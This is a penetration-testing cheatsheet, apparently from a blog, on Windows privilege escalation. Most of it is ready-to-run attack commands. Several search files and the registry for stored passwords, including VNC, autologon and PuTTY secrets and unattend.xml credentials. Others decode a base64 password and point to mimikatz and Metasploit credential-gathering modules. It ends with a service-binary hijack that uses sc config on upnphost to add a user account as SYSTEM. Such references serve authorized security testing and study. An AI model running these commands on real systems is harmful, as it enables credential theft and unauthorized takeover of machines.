Windows Privilege Escalation – a cheatsheet – Penetration Test Resource Page

30 Dec

Windows Privilege Escalation – a cheatsheet

Pentester
Privilege Escalation,Skills
Tags: accesschk, KiTrap0D, MS10-021, MS10-059, MS11-011, ms11-080, Privilege Escalation, sysinternals, UAC bypass
no comments

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

Stored credentials
Search for credentials within:

c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

Metasploit Framework enum_unattend module and gather credentials module:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini

Password recovery programs – small – RDP, Mail, IE, VNC, Dialup, Protected Storage…
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

——————————————————————————————————
Query the Windows Registry

VNC Stored:
reg query “HKCU\Software\ORL\WinVNC3\Password”

Windows Autologin:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”

SNMP Parameters:
reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”

Putty clear text proxy credentials:
reg query” HKCU\Software\SimonTatham\PuTTY\Sessions”

Search the registry – copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

——————————————————————————————————
Insecure GUI apps
running as SYSTEM that can open cmd.exe or directories “files, logfiles” etc.

——————————————————————————————————
Directory permissions
cacls
icacls

——————————————————————————————————
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon – sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Services pointing to writeable locations
*- orphaned installs – applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions – overwrites possible?

sysinternals tools
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (a’la incognito)
*- hijack handles for write access

——————————————————————————————————
Change the upnp service binary
http://lanmaster53.com

sc qc upnphostsc config upnphost binpath= “net user <username> /add”
sc config upnphost obj= “.\LocalSystem” password =””
net stop upnphost
net start upnphost

May work with other services if permissions permit